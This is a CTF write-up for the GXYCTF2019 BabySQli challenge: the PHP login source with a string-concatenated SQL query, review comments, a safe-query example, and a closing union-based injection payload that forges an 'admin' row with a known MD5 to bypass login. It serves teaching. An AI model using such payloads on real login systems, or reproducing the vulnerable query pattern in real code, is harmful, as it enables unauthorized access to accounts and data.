代码 [GXYCTF2019]BabySQli
- config.php
<?php
// config.php: connection parameters for the challenge database. Credentials are
// hard-coded in the shipped challenge source; they are not meant as a pattern to copy.
$dbSettings = [
    'DB_USER'     => '123',
    'DB_PASSWORD' => '123',
    // Lowercase on purpose: constant names are case-sensitive, and the lookup below uses db_host.
    'db_host'     => '127.0.0.1',
    'DB_NAME'     => 'web_sqli',
];
foreach ($dbSettings as $constantName => $constantValue) {
    define($constantName, $constantValue);
}
unset($dbSettings, $constantName, $constantValue);

// "or" binds looser than "=", so $con receives the handle (or false) first and die()
// only runs when the connect failed. The "@" hides the connection warning; only the
// mysqli_connect_error() text reaches the output.
$con = @mysqli_connect(db_host, DB_USER, DB_PASSWORD, DB_NAME)
    or die('couldnt connect' . mysqli_connect_error());
?>
- flag.php
<?php /* flag.php: the secret that search.php prints after a successful "admin" login (pulled in via require). */ $flag = 'GXY{y0u_4re_not_aDmin!}';?>
- index.php
<!-- index.php: login page. The two fields are POSTed as "name" and "pw" to search.php,
     which reads them as $_POST['name'] / $_POST['pw'] and performs the lookup. -->
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Do you know who am I?</title>
<center>
<form action="search.php" method="post" style="margin-top: 300">
<input type="text" name="name" placeholder="UserName" required>
<br>
<input type="password" style="margin-top: 20" name="pw" placeholder="password" required>
<br>
<button style="margin-top:20;" type="submit">登录</button>
</form>
</center>
- search.php
<!--MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5-->
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Do you know who am I?</title>
<?php
// search.php: receives the login form from index.php, looks the username up with a
// string-built query and prints $flag when the first row found is "admin" with a matching MD5.
require "config.php";  // defines $con (mysqli handle)
require "flag.php";    // defines $flag
// Strip the escaping added by magic_quotes_gpc (legacy; get_magic_quotes_gpc() was removed in PHP 8).
if (get_magic_quotes_gpc()) {
// Recursively stripslashes() a scalar or a nested request array.
function stripslashes_deep($value)
{
$value = is_array($value) ?
array_map('stripslashes_deep', $value) :
stripslashes($value);
return $value;
}
$_POST = array_map('stripslashes_deep', $_POST);
$_GET = array_map('stripslashes_deep', $_GET);
$_COOKIE = array_map('stripslashes_deep', $_COOKIE);
$_REQUEST = array_map('stripslashes_deep', $_REQUEST);
}
mysqli_query($con,'SET NAMES UTF8');
$name = $_POST['name'];
$password = $_POST['pw'];
$t_pw = md5($password); // unused: the check further down recomputes md5($password)
// The untrusted $name is concatenated straight into the SQL text — no escaping and no
// prepared statement — which is the injection point the rest of this write-up is about.
$sql = "select * from user where username = '".$name."'";
// echo $sql;
// NOTE: the statement is executed here, BEFORE the keyword filter below; the filter only
// decides what gets printed and never prevents the query from reaching the database.
$result = mysqli_query($con, $sql);
// Denylist filter on the username. NOTE(review): as printed, "(|)" is a group with an empty
// alternative and therefore matches every input; presumably the original was "\(|\)|=|or"
// with the backslashes lost in transcription. A regex denylist is in any case no substitute
// for a parameterised query.
if(preg_match("/(|)|=|or/", $name)){
die("do not hack me!");
}
else{
if (!$result) {
// The raw database error text is echoed to the client.
printf("Error: %s
", mysqli_error($con));
exit();
}
else{
// echo '<pre>';
// Only the first row of the result set is ever examined.
$arr = mysqli_fetch_row($result);
// print_r($arr);
// Loose (==) comparisons: column 1 against "admin", column 2 against the MD5 of the
// submitted password. A strict check (=== / hash_equals()) would be the safer choice.
if($arr[1] == "admin"){
if(md5($password) == $arr[2]){
echo $flag;
}
else{
die("wrong pass!");
}
}
else{
die("wrong user!");
}
}
}
?>
关键代码在search.php
$sql = "select * from user where username = '$name'";
$result = mysqli_query($con, $sql);
正常的逻辑应该为:
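<?php
// Reference example of a query whose text is fixed: no request data is concatenated into
// $sql, so there is nothing for a caller to inject. When user input has to become part of
// a query, the safe equivalent is a prepared statement (mysqli_prepare + mysqli_stmt_bind_param),
// never string concatenation as in search.php.
$servername = "localhost";
$username = "username";
$password = "password";
$dbname = "myDB";
// Create the connection
$conn = mysqli_connect($servername, $username, $password, $dbname);
// Check connection
if (!$conn) {
    die("连接失败: " . mysqli_connect_error());
}
$sql = "SELECT id, firstname, lastname FROM MyGuests";
$result = mysqli_query($conn, $sql);
// A failed query returns false, and mysqli_num_rows(false) is an error (TypeError on PHP 8),
// so fail explicitly here instead of falling through to the row loop.
if ($result === false) {
    die("查询失败: " . mysqli_error($conn));
}
if (mysqli_num_rows($result) > 0) {
    // Print each row
    while ($row = mysqli_fetch_assoc($result)) {
        echo "id: " . $row["id"] . " - Name: " . $row["firstname"] . " " . $row["lastname"] . "<br>";
    }
} else {
    echo "0 结果";
}
mysqli_close($conn);
?>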
mysql Union查询特性
UNION 查询时，即使第一个 SELECT 没有匹配到任何行，第二个 SELECT 中写死的常量也会作为一行结果返回，相当于构造了一条并不存在于表中的“虚拟”数据。
所以,如果username输入
1' union select 1,'admin','900150983cd24fb0d6963f7d28e17f72'#
password 输入 abc（上面那串 900150983cd24fb0d6963f7d28e17f72 正是 abc 的 MD5，与 search.php 中 md5($password) == $arr[2] 的比较相吻合），就可以登录成功。